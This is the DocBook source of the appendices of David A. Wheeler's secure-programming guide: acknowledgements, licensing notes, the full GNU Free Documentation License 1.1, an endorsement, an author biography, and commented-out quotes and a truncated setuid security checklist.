<appendix id="acknowledgements">
<title>Acknowledgements</title>

<epigraph>
<attribution>Proverbs 27:17 (NIV)</attribution>
<para>
As iron sharpens iron, so one man sharpens another.
</para>
</epigraph>

<para>
My thanks to the following people who kept me honest by sending me emails
noting errors, suggesting areas to cover, asking questions, and so on.
Where email addresses are included, they've been
shrouded by prepending my ``thanks.'' so bulk emailers
won't easily get these addresses; inclusion of people in this list is
<emphasis>not</emphasis> an authorization to send
unsolicited bulk email to them.

<itemizedlist>
<listitem><para>
Neil Brown (thanks.neilb@cse.unsw.edu.au)
</para></listitem>

<listitem><para>
Martin Douda (thanks.mad@students.zcu.cz)
</para></listitem>

<listitem><para>
Jorge Godoy
</para></listitem>

<listitem><para>
Scott Ingram (thanks.scott@silver.jhuapl.edu)
</para></listitem>

<listitem><para>
Michael Kerrisk
</para></listitem>

<listitem><para>
Doug Kilpatrick
</para></listitem>

<listitem><para>
John Levon (levon@movementarian.org)
<!-- was John Levon (moz@compsoc.man.ac.uk) -->
</para></listitem>

<listitem><para>
Ryan McCabe (thanks.odin@numb.org)
</para></listitem>

<listitem><para>
Paul Millar (thanks.paulm@astro.gla.ac.uk)
</para></listitem>

<listitem><para>
Chuck Phillips (thanks.cdp@peakpeak.com)
</para></listitem>

<listitem><para>
Martin Pool (thanks.mbp@humbug.org.au)
</para></listitem>

<listitem><para>
Eric S. Raymond (thanks.esr@snark.thyrsus.com)
</para></listitem>

<listitem><para>
Marc Welz
</para></listitem>

<listitem><para>
Eric Werme (thanks.werme@alpha.zk3.dec.com)
</para></listitem>

</itemizedlist>

</para>

<para>
If you want to be on this list, please send me a constructive suggestion at
<ulink
url="mailto:dwheeler@dwheeler.com">dwheeler@dwheeler.com</ulink>.
If you send me a constructive suggestion, but do <emphasis remap="it">not</emphasis> want credit,
please let me know that when you send your suggestion, comment, or
criticism; normally I expect that people want credit, and I want to give
them that credit.
My current process is to add contributor names to this list in the document,
with more detailed explanation of their comment in the ChangeLog for
this document (available on-line).
Note that although these people have sent in ideas, the actual text is my own,
so don't blame them for any errors that may remain.
Instead, please send me another constructive suggestion.
</para>

</appendix>

<appendix id="about-license">
<title>About the Documentation License</title>

<epigraph>
<attribution>Esther 3:14 (NIV)</attribution>
<para>
A copy of the text of the edict was to be issued as law
in every province and made known to the people of every
nationality so they would be ready for that day.
</para>
</epigraph>

<para>
This document is Copyright (C) 1999-2000 David A. Wheeler.
Permission is granted to copy, distribute and/or modify
this document under the terms of the GNU Free Documentation License (FDL),
Version 1.1 or any later version published by the Free Software Foundation;
with the invariant sections being ``About the Author'',
with no Front-Cover Texts, and no Back-Cover texts.
A copy of the license is included below in
<xref linkend="fdl">.
</para>

<para>
These terms do permit mirroring by other web sites,
but be <emphasis remap="it">sure</emphasis> to do the following:

<itemizedlist>
<listitem>

<para>
make sure your mirrors automatically get upgrades from the master site,
</para>
</listitem>
<listitem>
<para>
clearly show the location of the master site
(<ulink
url="http://www.dwheeler.com/secure-programs">http://www.dwheeler.com/secure-programs</ulink>), with a hypertext link
to the master site, and
</para>
</listitem>

<listitem>
<para>
give me (David A. Wheeler) credit as the author.
</para>
</listitem>

</itemizedlist>

</para>

<para>
The first two points primarily protect me from repeatedly hearing about
obsolete bugs.
I do not want to hear about bugs I fixed a year ago, just because you
are not properly mirroring the document.
By linking to the master site,
users can check and see if your mirror is up-to-date.
I'm sensitive to the problems of sites which have very
strong security requirements and therefore cannot risk normal
connections to the Internet; if that describes your situation,
at least try to meet the other points
and try to occasionally sneakernet updates into your environment.
</para>

<para>
By this license, you may modify the document,
but you can't claim that what you didn't write is yours (i.e., plagiarism)
nor can you pretend that a modified version is identical to
the original work.
Modifying the work does not transfer copyright of the entire work to you;
this is not a ``public domain'' work in terms of copyright law.
See the license in <xref linkend="fdl"> for details.
If you have questions about what the license allows, please contact me.
In most cases, it's better if you send your changes to the master
integrator (currently David A. Wheeler), so that your changes will be
integrated with everyone else's changes into the master copy.
</para>

<para>
I am not a lawyer, nevertheless, it's my position as an author
and software developer that any code fragments
not explicitly marked otherwise are so small that their use fits under
the ``fair use'' doctrine in copyright law.
In other words, unless marked otherwise, you can use the code fragments
without any restriction at all.
Copyright law does not permit copyrighting absurdly small components
of a work
(e.g., ``I own all rights to B-flat and B-flat minor chords''), and
the fragments not marked otherwise are of the same kind of minuscule
size when compared to real programs.
I've done my best to give credit for specific pieces of code
written by others.
Some of you may still be concerned about the legal status of this code,
and I want make sure that it's clear
that you can use this code in your software.
Therefore, code fragments included directly in this document not otherwise
marked have also been released by me under the terms of the ``MIT license'',
to ensure you that there's no serious legal encumbrance:
</para>

<programlisting width="66">
  Source code in this book not otherwise identified is
  Copyright (c) 1999-2001 David A. Wheeler.

  Permission is hereby granted, free of charge, to any person
  obtaining a copy of the source code in this book not
  otherwise identified (the "Software"), to deal in the
  Software without restriction, including without limitation
  the rights to use, copy, modify, merge, publish, distribute,
  sublicense, and/or sell copies of the Software, and to
  permit persons to whom the Software is furnished to do so,
  subject to the following conditions:

  The above copyright notice and this permission notice shall be
  included in all copies or substantial portions of the Software.

  THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
  EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
  WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
  PURPOSE AND NONINFRINGEMENT.
  IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
  LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
  WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
  ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE
  OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
</programlisting>

</appendix>


<!-- Previously it had label="A" -->
<appendix id="fdl">
  <title>GNU Free Documentation License</title>
  <para>
    Version 1.1, March 2000
  </para>

  <para>
    Copyright &copy; 2000
    <address>
      Free Software Foundation, Inc.
      <street>59 Temple Place, Suite 330</street>,
      <city>Boston</city>,
      <state>MA</state>
      <postcode>02111-1307</postcode>
      <country>USA</country>
    </address>
    Everyone is permitted to copy and distribute verbatim copies of this license
    document, but changing it is not allowed.
  </para>

  <variablelist>
    <varlistentry id="fdl-preamble">
      <term>0. PREAMBLE</term>
      <listitem>
	<para>
	  The purpose of this License is to make a manual, textbook, or other
	  written document "free" in the sense of freedom: to assure everyone
	  the effective freedom to copy and redistribute it, with or without
	  modifying it, either commercially or noncommercially. Secondarily,
	  this License preserves for the author and publisher a way to get
	  credit for their work, while not being considered responsible for
	  modifications made by others.
	</para>

	<para>
	  This License is a kind of "copyleft", which means that derivative
	  works of the document must themselves be free in the same sense. It
	  complements the GNU General Public License, which is a copyleft
	  license designed for free software.
	</para>

	<para>
	  We have designed this License in order to use it for manuals for free
	  software, because free software needs free documentation: a free
	  program should come with manuals providing the same freedoms that the
	  software does. But this License is not limited to software manuals; it
	  can be used for any textual work, regardless of subject matter or
	  whether it is published as a printed book. We recommend this License
	  principally for works whose purpose is instruction or reference.
	</para>
      </listitem>
    </varlistentry>
    <varlistentry id="fdl-section1">
      <term>1. APPLICABILITY AND DEFINITIONS</term>
      <listitem>
	<para id="fdl-document">
	  This License applies to any manual or other work that contains a
	  notice placed by the copyright holder saying it can be distributed
	  under the terms of this License. The <link
	  linkend="fdl-document">"Document" </link>, below, refers to any such
	  manual or work. Any member of the public is a licensee, and is
	  addressed as "you".
	</para>

	<para id="fdl-modified">
	  A <link linkend="fdl-modified">"Modified Version"</link> of the
	  Document means any work containing the Document or a portion of it,
	  either copied verbatim, or with modifications and/or translated into
	  another language.
	</para>

	<para id="fdl-secondary">
	  A <link linkend="fdl-secondary">"Secondary Section"</link> is a named
	  appendix or a front-matter section of the <link
	  linkend="fdl-document">Document</link> that deals exclusively with the
	  relationship of the publishers or authors of the <link
	  linkend="fdl-document"> Document</link> to the <link
	  linkend="fdl-document"> Document's</link> overall subject (or to
	  related matters) and contains nothing that could fall directly within
	  that overall subject. (For example, if the <link
	  linkend="fdl-document">Document</link> is in part a textbook of
	  mathematics, a <link linkend="fdl-secondary">Secondary Section</link>
	  may not explain any mathematics.)  The relationship could be a matter
	  of historical connection with the subject or with related matters, or
	  of legal, commercial, philosophical, ethical or political position
	  regarding them.
	</para>

	<para id="fdl-invariant">
	  The <link linkend="fdl-invariant">"Invariant Sections"</link> are
	  certain <link linkend="fdl-secondary"> Secondary Sections</link> whose
	  titles are designated, as being those of <link
	  linkend="fdl-invariant">Invariant Sections</link>, in the notice that
	  says that the <link linkend="fdl-document">Document</link> is released
	  under this License.
	</para>

	<para id="fdl-cover-texts">
	  The <link linkend="fdl-cover-texts">"Cover Texts"</link> are certain
	  short passages of text that are listed, as <link
	  linkend="fdl-cover-texts">Front-Cover Texts</link> or <link
	  linkend="fdl-cover-texts">Back-Cover Texts</link>, in the notice that
	  says that the <link linkend="fdl-document">Document</link> is released
	  under this License.
	</para>

	<para id="fdl-transparent">
	  A <link linkend="fdl-transparent">"Transparent"</link> copy of the
	  <link linkend="fdl-document"> Document</link> means a machine-readable
	  copy, represented in a format whose specification is available to the
	  general public, whose contents can be viewed and edited directly and
	  straightforwardly with generic text editors or (for images composed of
	  pixels) generic paint programs or (for drawings) some widely available
	  drawing editor, and that is suitable for input to text formatters or
	  for automatic translation to a variety of formats suitable for input
	  to text formatters. A copy made in an otherwise <link
	  linkend="fdl-transparent"> Transparent</link> file format whose markup
	  has been designed to thwart or discourage subsequent modification by
	  readers is not <link linkend="fdl-transparent">Transparent</link>.  A
	  copy that is not <link linkend="fdl-transparent">"Transparent"</link>
	  is called "Opaque".
	</para>

	<para>
	  Examples of suitable formats for <link
	  linkend="fdl-transparent">Transparent</link> copies include plain
	  ASCII without markup, Texinfo input format, LaTeX input format, SGML
	  or XML using a publicly available DTD, and standard-conforming simple
	  HTML designed for human modification. Opaque formats include
	  PostScript, PDF, proprietary formats that can be read and edited only
	  by proprietary word processors, SGML or XML for which the DTD and/or
	  processing tools are not generally available, and the
	  machine-generated HTML produced by some word processors for output
	  purposes only.
	</para>

	<para id="fdl-title-page">
	  The <link linkend="fdl-title-page">"Title Page"</link> means, for a
	  printed book, the title page itself, plus such following pages as are
	  needed to hold, legibly, the material this License requires to appear
	  in the title page. For works in formats which do not have any title
	  page as such, <link linkend="fdl-title-page"> "Title Page"</link>
	  means the text near the most prominent appearance of the work's title,
	  preceding the beginning of the body of the text.
	</para>
      </listitem>
    </varlistentry>

    <varlistentry id="fdl-section2">
      <term>2. VERBATIM COPYING</term>
      <listitem>
	<para>
	  You may copy and distribute the <link
	  linkend="fdl-document">Document</link> in any medium, either
	  commercially or noncommercially, provided that this License, the
	  copyright notices, and the license notice saying this License applies
	  to the <link linkend="fdl-document">Document</link> are reproduced in
	  all copies, and that you add no other conditions whatsoever to those
	  of this License. You may not use technical measures to obstruct or
	  control the reading or further copying of the copies you make or
	  distribute. However, you may accept compensation in exchange for
	  copies. If you distribute a large enough number of copies you must
	  also follow the conditions in <link linkend="fdl-section3">section
	  3</link>.
	</para>

	<para>
	  You may also lend copies, under the same conditions stated above, and
	  you may publicly display copies.
	</para>
      </listitem>
    </varlistentry>

    <varlistentry id="fdl-section3">
      <term>3. COPYING IN QUANTITY</term>
      <listitem>
	<para>
	  If you publish printed copies of the <link
	  linkend="fdl-document">Document</link> numbering more than 100, and
	  the <link linkend="fdl-document">Document's</link> license notice
	  requires <link linkend="fdl-cover-texts">Cover Texts</link>, you must
	  enclose the copies in covers that carry, clearly and legibly, all
	  these <link linkend="fdl-cover-texts">Cover Texts</link>:  Front-Cover
	  Texts on the front cover, and Back-Cover Texts on the back cover. Both
	  covers must also clearly and legibly identify you as the publisher of
	  these copies. The front cover must present the full title with all
	  words of the title equally prominent and visible. You may add other
	  material on the covers in addition. Copying with changes limited to
	  the covers, as long as they preserve the title of the <link
	  linkend="fdl-document">Document</link> and satisfy these conditions,
	  can be treated as verbatim copying in other respects.
	</para>

	<para>
	  If the required texts for either cover are too voluminous to fit
	  legibly, you should put the first ones listed (as many as fit
	  reasonably) on the actual cover, and continue the rest onto adjacent
	  pages.
	</para>

	<para>
	  If you publish or distribute <link
	  linkend="fdl-transparent">Opaque</link> copies of the <link
	  linkend="fdl-document">Document</link> numbering more than 100, you
	  must either include a machine-readable <link
	  linkend="fdl-transparent">Transparent</link> copy along with each
	  <link linkend="fdl-transparent">Opaque</link> copy, or state in or
	  with each <link linkend="fdl-transparent">Opaque</link> copy a
	  publicly-accessible computer-network location containing a complete
	  <link linkend="fdl-transparent"> Transparent</link> copy of the <link
	  linkend="fdl-document">Document</link>, free of added material, which
	  the general network-using public has access to download anonymously at
	  no charge using public-standard network protocols. If you use the
	  latter option, you must take reasonably prudent steps, when you begin
	  distribution of <link linkend="fdl-transparent">Opaque</link> copies
	  in quantity, to ensure that this <link
	  linkend="fdl-transparent">Transparent</link> copy will remain thus
	  accessible at the stated location until at least one year after the
	  last time you distribute an <link
	  linkend="fdl-transparent">Opaque</link> copy (directly or through your
	  agents or retailers) of that edition to the public.
	</para>

	<para>
	  It is requested, but not required, that you contact the authors of the
	  <link linkend="fdl-document">Document</link> well before
	  redistributing any large number of copies, to give them a chance to
	  provide you with an updated version of the <link
	  linkend="fdl-document">Document</link>.
	</para>
      </listitem>
    </varlistentry>

    <varlistentry id="fdl-section4">
      <term>4. MODIFICATIONS</term>
      <listitem>
	<para>
	  You may copy and distribute a <link linkend="fdl-modified">Modified
	  Version</link> of the <link linkend="fdl-document">Document</link>
	  under the conditions of sections <link linkend="fdl-section2">2</link>
	  and <link linkend="fdl-section3">3</link> above, provided that you
	  release the <link linkend="fdl-modified">Modified Version</link> under
	  precisely this License, with the <link linkend="fdl-modified">Modified
	  Version</link> filling the role of the <link
	  linkend="fdl-document">Document</link>, thus licensing distribution
	  and modification of the <link linkend="fdl-modified">Modified
	  Version</link> to whoever possesses a copy of it. In addition, you
	  must do these things in the <link linkend="fdl-modified">Modified
	  Version</link>:
	</para>

	<orderedlist numeration="upperalpha">
	  <listitem>
	      <para>
		Use in the <link linkend="fdl-title-page">Title Page</link> (and
		on the covers, if any) a title distinct from that of the <link
		linkend="fdl-document">Document</link>, and from those of
		previous versions (which should, if there were any, be listed in
		the History section of the <link
		linkend="fdl-document">Document</link>). You may use the same
		title as a previous version if the original publisher of that
		version gives permission.
	      </para>
	  </listitem>

	  <listitem>
	      <para>
		List on the <link linkend="fdl-title-page">Title Page</link>, as
		authors, one or more persons or entities responsible for
		authorship of the modifications in the <link
		linkend="fdl-modified">Modified Version</link>, together with at
		least five of the principal authors of the <link
		linkend="fdl-document">Document</link> (all of its principal
		authors, if it has less than five).
	      </para>
	  </listitem>

	  <listitem>
	      <para>
		State on the <link linkend="fdl-title-page">Title Page</link>
		the name of the publisher of the <link
		linkend="fdl-modified">Modified Version</link>, as the
		publisher.
	      </para>
	  </listitem>

	  <listitem>
	      <para>
		Preserve all the copyright notices of the <link
		linkend="fdl-document">Document</link>.
	      </para>
	  </listitem>

	  <listitem>
	      <para>
		Add an appropriate copyright notice for your modifications
		adjacent to the other copyright notices.
	      </para>
	  </listitem>

	  <listitem>
	      <para>
		Include, immediately after the copyright notices, a license
		notice giving the public permission to use the <link
		linkend="fdl-modified">Modified Version</link> under the terms
		of this License, in the form shown in the Addendum below.
	      </para>
	  </listitem>

	  <listitem>
	      <para>
		Preserve in that license notice the full lists of <link
		linkend="fdl-invariant"> Invariant Sections</link> and required
		<link linkend="fdl-cover-texts">Cover Texts</link> given in the
		<link linkend="fdl-document">Document's</link> license notice.
	      </para>
	  </listitem>

	  <listitem>
	      <para>
		Include an unaltered copy of this License.
	      </para>
	  </listitem>

	  <listitem>
	      <para>
		Preserve the section entitled "History", and its title, and add
		to it an item stating at least the title, year, new authors, and
		publisher of the <link linkend="fdl-modified">Modified Version
		</link>as given on the <link linkend="fdl-title-page">Title
		Page</link>.  If there is no section entitled "History" in the
		<link linkend="fdl-document">Document</link>, create one stating
		the title, year, authors, and publisher of the <link
		linkend="fdl-document">Document</link> as given on its <link
		linkend="fdl-title-page">Title Page</link>, then add an item
		describing the <link linkend="fdl-modified">Modified
		Version</link> as stated in the previous sentence.
	      </para>
	  </listitem>

	  <listitem>
	      <para>
		Preserve the network location, if any, given in the <link
		linkend="fdl-document">Document</link> for public access to a
		<link linkend="fdl-transparent">Transparent</link> copy of the
		<link linkend="fdl-document">Document</link>, and likewise the
		network locations given in the <link
		linkend="fdl-document">Document</link> for previous versions it
		was based on. These may be placed in the "History" section. You
		may omit a network location for a work that was published at
		least four years before the <link
		linkend="fdl-document">Document</link> itself, or if the
		original publisher of the version it refers to gives permission.
	      </para>
	  </listitem>

	  <listitem>
	      <para>
		In any section entitled "Acknowledgements" or "Dedications",
		preserve the section's title, and preserve in the section all
		the substance and tone of each of the contributor
		acknowledgements and/or dedications given therein.
	      </para>
	  </listitem>

	  <listitem>
	      <para>
		Preserve all the <link linkend="fdl-invariant">Invariant
		Sections</link> of the <link
		linkend="fdl-document">Document</link>, unaltered in their text
		and in their titles.  Section numbers or the equivalent are not
		considered part of the section titles.
	      </para>
	  </listitem>

	  <listitem>
	      <para>
		Delete any section entitled "Endorsements". Such a section may
		not be included in the <link linkend="fdl-modified">Modified
		Version</link>.
	      </para>
	  </listitem>

	  <listitem>
	      <para>
		Do not retitle any existing section as "Endorsements" or to
		conflict in title with any <link
		linkend="fdl-invariant">Invariant Section</link>.
	      </para>
	  </listitem>
	</orderedlist>

	<para>
	  If the <link linkend="fdl-modified">Modified Version</link> includes
	  new front-matter sections or appendices that qualify as <link
	  linkend="fdl-secondary">Secondary Sections</link> and contain no
	  material copied from the Document, you may at your option designate
	  some or all of these sections as invariant. To do this, add their
	  titles to the list of <link linkend="fdl-invariant">Invariant
	  Sections</link> in the <link linkend="fdl-modified">Modified
	  Version's</link> license notice. These titles must be distinct from
	  any other section titles.
	</para>

	<para>
	  You may add a section entitled "Endorsements", provided it contains
	  nothing but endorsements of your <link linkend="fdl-modified">Modified
	  Version</link> by various parties--for example, statements of peer
	  review or that the text has been approved by an organization as the
	  authoritative definition of a standard.
	</para>

	<para>
	  You may add a passage of up to five words as a <link
	  linkend="fdl-cover-texts">Front-Cover Text</link>, and a passage of up
	  to 25 words as a <link linkend="fdl-cover-texts">Back-Cover
	  Text</link>, to the end of the list of <link
	  linkend="fdl-cover-texts">Cover Texts</link> in the <link
	  linkend="fdl-modified">Modified Version</link>.  Only one passage of
	  <link linkend="fdl-cover-texts">Front-Cover Text</link> and one of
	  <link linkend="fdl-cover-texts">Back-Cover Text</link> may be added by
	  (or through arrangements made by) any one entity. If the <link
	  linkend="fdl-document">Document</link> already includes a cover text
	  for the same cover, previously added by you or by arrangement made by
	  the same entity you are acting on behalf of, you may not add another;
	  but you may replace the old one, on explicit permission from the
	  previous publisher that added the old one.
	</para>

	<para>
	  The author(s) and publisher(s) of the <link
	  linkend="fdl-document">Document</link> do not by this License give
	  permission to use their names for publicity for or to assert or imply
	  endorsement of any <link linkend="fdl-modified">Modified Version
	  </link>.
	</para>
      </listitem>
    </varlistentry>

    <varlistentry id="fdl-section5">
      <term>5. COMBINING DOCUMENTS</term>
      <listitem>
	<para>
	  You may combine the <link linkend="fdl-document">Document</link> with
	  other documents released under this License, under the terms defined
	  in <link linkend="fdl-section4">section 4</link> above for modified
	  versions, provided that you include in the combination all of the
	  <link linkend="fdl-invariant">Invariant Sections</link> of all of the
	  original documents, unmodified, and list them all as <link
	  linkend="fdl-invariant">Invariant Sections</link> of your combined
	  work in its license notice.
	</para>

	<para>
	  The combined work need only contain one copy of this License, and
	  multiple identical <link linkend="fdl-invariant">Invariant
	  Sections</link> may be replaced with a single copy. If there are
	  multiple <link linkend="fdl-invariant"> Invariant Sections</link> with
	  the same name but different contents, make the title of each such
	  section unique by adding at the end of it, in parentheses, the name of
	  the original author or publisher of that section if known, or else a
	  unique number. Make the same adjustment to the section titles in the
	  list of <link linkend="fdl-invariant">Invariant Sections</link> in the
	  license notice of the combined work.
	</para>

	<para>
	  In the combination, you must combine any sections entitled "History"
	  in the various original documents, forming one section entitled
	  "History"; likewise combine any sections entitled "Acknowledgements",
	  and any sections entitled "Dedications". You must delete all sections
	  entitled "Endorsements."
	</para>
      </listitem>
    </varlistentry>

    <varlistentry id="fdl-section6">
      <term>6. COLLECTIONS OF DOCUMENTS</term>
      <listitem>
	<para>
	  You may make a collection consisting of the <link
	  linkend="fdl-document">Document</link> and other documents released
	  under this License, and replace the individual copies of this License
	  in the various documents with a single copy that is included in the
	  collection, provided that you follow the rules of this License for
	  verbatim copying of each of the documents in all other respects.
	</para>

	<para>
	  You may extract a single document from such a collection, and
	  distribute it individually under this License, provided you insert a
	  copy of this License into the extracted document, and follow this
	  License in all other respects regarding verbatim copying of that
	  document.
	</para>
      </listitem>
    </varlistentry>

    <varlistentry id="fdl-section7">
      <term>7. AGGREGATION WITH INDEPENDENT WORKS</term>
      <listitem>
	<para>
	  A compilation of the <link linkend="fdl-document">Document</link> or
	  its derivatives with other separate and independent documents or
	  works, in or on a volume of a storage or distribution medium, does not
	  as a whole count as a <link linkend="fdl-modified">Modified
	  Version</link> of the <link linkend="fdl-document"> Document</link>,
	  provided no compilation copyright is claimed for the compilation.
	  Such a compilation is called an "aggregate", and this License does not
	  apply to the other self-contained works thus compiled with the <link
	  linkend="fdl-document">Document</link> , on account of their being
	  thus compiled, if they are not themselves derivative works of the
	  <link linkend="fdl-document">Document</link>.  If the <link
	  linkend="fdl-cover-texts">Cover Text</link> requirement of <link
	  linkend="fdl-section3">section 3</link> is applicable to these copies
	  of the <link linkend="fdl-document">Document</link>, then if the <link
	  linkend="fdl-document">Document</link> is less than one quarter of the
	  entire aggregate, the <link linkend="fdl-document">Document's</link>
	  <link linkend="fdl-cover-texts">Cover Texts</link> may be placed on
	  covers that surround only the <link
	  linkend="fdl-document">Document</link> within the aggregate. Otherwise
	  they must appear on covers around the whole aggregate.
	</para>
      </listitem>
    </varlistentry>

    <varlistentry id="fdl-section8">
      <term>8. TRANSLATION</term>
      <listitem>
	<para>
	  Translation is considered a kind of modification, so you may
	  distribute translations of the <link
	  linkend="fdl-document">Document</link> under the terms of <link
	  linkend="fdl-section4">section 4</link>. Replacing <link
	  linkend="fdl-invariant"> Invariant Sections</link> with translations
	  requires special permission from their copyright holders, but you may
	  include translations of some or all <link
	  linkend="fdl-invariant">Invariant Sections</link> in addition to the
	  original versions of these <link linkend="fdl-invariant">Invariant
	  Sections</link>. You may include a translation of this License
	  provided that you also include the original English version of this
	  License. In case of a disagreement between the translation and the
	  original English version of this License, the original English version
	  will prevail.
	</para>
      </listitem>
    </varlistentry>

    <varlistentry id="fdl-section9">
      <term>9. TERMINATION</term>
      <listitem>
	<para>
	  You may not copy, modify, sublicense, or distribute the <link
	  linkend="fdl-document">Document</link> except as expressly provided
	  for under this License. Any other attempt to copy, modify, sublicense
	  or distribute the <link linkend="fdl-document">Document</link> is
	  void, and will automatically terminate your rights under this
	  License. However, parties who have received copies, or rights, from
	  you under this License will not have their licenses terminated so long
	  as such parties remain in full compliance.
	</para>
      </listitem>
    </varlistentry>

    <varlistentry id="fdl-section10">
      <term>10. FUTURE REVISIONS OF THIS LICENSE</term>
      <listitem>
	<para>
	  The <ulink type="http" url="http://www.gnu.org/fsf/fsf.html">Free
	  Software Foundation</ulink> may publish new, revised versions of the
	  GNU Free Documentation License from time to time. Such new versions
	  will be similar in spirit to the present version, but may differ in
	  detail to address new problems or concerns. See <ulink type="http"
	  url="http://www.gnu.org/copyleft">http://www.gnu.org/copyleft/</ulink>.
	</para>

	<para>
	  Each version of the License is given a distinguishing version
	  number. If the <link linkend="fdl-document">Document</link> specifies
	  that a particular numbered version of this License "or any later
	  version" applies to it, you have the option of following the terms and
	  conditions either of that specified version or of any later version
	  that has been published (not as a draft) by the Free Software
	  Foundation. If the <link linkend="fdl-document">Document</link> does
	  not specify a version number of this License, you may choose any
	  version ever published (not as a draft) by the Free Software
	  Foundation.
	</para>
      </listitem>
    </varlistentry>

    <varlistentry id="fdl-using">
      <term>Addendum</term>
      <listitem>
	<para>
	  To use this License in a document you have written, include a copy of
	  the License in the document and put the following copyright and
	  license notices just after the title page:
	</para>

	<para>
	  Copyright &copy; YEAR  YOUR NAME.
	</para>

	<para>
	  Permission is granted to copy, distribute and/or modify this document
	  under the terms of the GNU Free Documentation License, Version 1.1 or
	  any later version published by the Free Software Foundation; with the
	  <link linkend="fdl-invariant">Invariant Sections</link> being LIST
	  THEIR TITLES, with the <link linkend="fdl-cover-texts">Front-Cover
	  Texts</link> being LIST, and with the <link
	  linkend="fdl-cover-texts">Back-Cover Texts</link> being LIST.  A copy
	  of the license is included in the section entitled <quote>GNU Free
	  Documentation License</quote>.
	</para>

	<para>
	  If you have no <link linkend="fdl-invariant">Invariant
	  Sections</link>, write "with no Invariant Sections" instead of saying
	  which ones are invariant.  If you have no <link
	  linkend="fdl-cover-texts">Front-Cover Texts</link>, write "no
	  Front-Cover Texts" instead of "Front-Cover Texts being LIST"; likewise
	  for <link linkend="fdl-cover-texts">Back-Cover Texts</link>.
	</para>

	<para>
	  If your document contains nontrivial examples of program code, we
	  recommend releasing these examples in parallel under your choice of
	  free software license, such as the <ulink type="http"
	  url="http://www.gnu.org/copyleft/gpl.html"> GNU General Public
	  License</ulink>, to permit their use in free software.
	</para>
      </listitem>
    </varlistentry>
  </variablelist>
</appendix>

<appendix id="endorsements">
<title>Endorsements</title>
<para>
This version of the document is endorsed by the
original author, David A. Wheeler, as a document that
should improve the security of programs,
when applied correctly.
Note that no book, including this one, can guarantee that a developer
who follows its guidelines will produce perfectly secure software.
Modifications (including translations) must remove this appendix
per the license agreement included above.
</para>
</appendix>


<appendix id="about-author">
<title>About the Author</title>

<mediaobject>
 <imageobject>
  <imagedata fileref="images/dwheeler2003b.jpg" format="jpg">
 </imageobject>
 <caption>
  <para>David A. Wheeler</para>
 </caption>
</mediaobject>

<para>
David A. Wheeler is an expert in computer security and
has long specialized in development techniques for large and
high-risk software systems.
He has been involved in software development
since the mid-1970s,
and been involved with Unix and computer security since the early 1980s.
His areas of knowledge include computer security,
software safety, vulnerability analysis, inspections, Internet technologies,
software-related standards (including POSIX),
real-time software development techniques,
and numerous computer languages
(including Ada, C, C++, Perl, Python, and Java).
</para>

<para>
Mr. Wheeler is co-author and lead editor of the IEEE book
<emphasis>Software Inspection: An Industry Best Practice</emphasis>,
author of the book
<emphasis>Ada95: The Lovelace Tutorial</emphasis>,
and co-author of the
<emphasis>GNOME User's Guide</emphasis>.
He is also the author of many smaller papers and articles, including the
Linux <emphasis>Program Library HOWTO</emphasis>.
</para>

<para>
Mr. Wheeler hopes that, by making this document available, other
developers will make their software more secure.
You can reach him by email at dwheeler@dwheeler.com (no spam please),
and you can also see his web site at
<ulink url="http://www.dwheeler.com">http://www.dwheeler.com</ulink>.
</para>
</appendix>


<!--Miscellaneous quotes:
    Do not deprive the alien or the fatherless of justice,
    or take the cloak of the widow as a pledge.
            Deuteronomy 24:17


   Words from a wise man's mouth are gracious, but a fool is consumed
   by his own lips. At the beginning his words are folly;
   at the end they are wicked madness
             Ecclesiastes 10:12-13


   I took the deed of purchase - the sealed copy containing the
   terms and conditions, as well as the unsealed copy -
         Jeremiah 32:11 (English-NIV)


   Esther had not revealed her nationality and family background,
   because Mordecai had forbidden her to do so.
            Esther 2:10


   When the righteous thrive, the people rejoice;
   when the wicked rule, the people groan.
            Proverbs 29:2

   When words are many, sin is not absent, but he who holds his tongue is wise.
          Proverbs 10:19


   Reckless words pierce like a sword,
   but the tongue of the wise brings healing.
            Proverbs 12:18


   "Go and inquire of the LORD for me and for the people and for all Judah
   about what is written in this book that has been found.
   Great is the LORD's anger that burns against us because our fathers
   have not obeyed the words of this book; they have not acted in
   accordance with all that is written there concerning us."
            2 Kings 22:13

   Only be careful, and watch yourselves closely so that you do not forget
   the things your eyes have seen or let them slip from your heart
   as long as you live. Teach them to your children and to their
   children after them.
            Deuteronomy 4:9

   You prepare a table before me
   in the presence of my enemies.
   You anoint my head with oil;
   my cup overflows.   Psalm 23:5 (NIV)

   An enemy will overrun the land; he will pull down your strongholds and
   plunder your fortresses."
   Amos 3:11

    But my brothers are as undependable as intermittent streams,
    as the streams that overflow
     Job 6:15

???:  http://soledad.cs.ucdavis.edu/
 describes Linux BSM, an auditing project.

 ???: Could add a discussion of legal issues and requirements,
 U.S. and internationally.

??? Discuss formal proofs.


Per http://www.tldp.org/LDP/LDP-Author-Guide/images.html,
the template for images is:
 <figure>
    <title>LyX screen shot</title>
    <mediaobject>
       <imageobject>
          <imagedata fileref="lyx_screenshot.eps" format="eps">
       </imageobject>
       <imageobject>
          <imagedata fileref="lyx_screenshot.jpg" format="jpg">
       </imageobject>
       <textobject>
          <phrase>Screen shot of the LyX document processing program</phrase>
       </textobject>
    </mediaobject>
 </figure>

-->

<!--
Here is Henry Spenser's 1987 man page on writing setuid programs,
reposted in the Bugtraq of April 25, 2002; sometime I intend to
go back through this and make sure I haven't missed anything:


...TH SETUID 7 local
...DA 21 Feb 1987
...SH NAME
setuid \- checklist for security of setuid programs
...SH DESCRIPTION
Writing a secure setuid (or setgid) program is tricky.
There are a number of possible ways of subverting such a program.
The most conspicuous security holes occur when a setuid program is
not sufficiently careful to avoid giving away access to resources
it legitimately has the use of.
Most of the other attacks are basically a matter of altering the program's
environment in unexpected ways and hoping it will fail in some
security-breaching manner.
There are generally three categories of environment manipulation:
supplying a legal but unexpected environment that may cause the
program to directly do something insecure,
arranging for error conditions that the program may not handle correctly,
and the specialized subcategory of giving the program inadequate
resources in hopes that it won't respond properly.
...PP
The following are general considerations of security when writing
a setuid program.
...de P
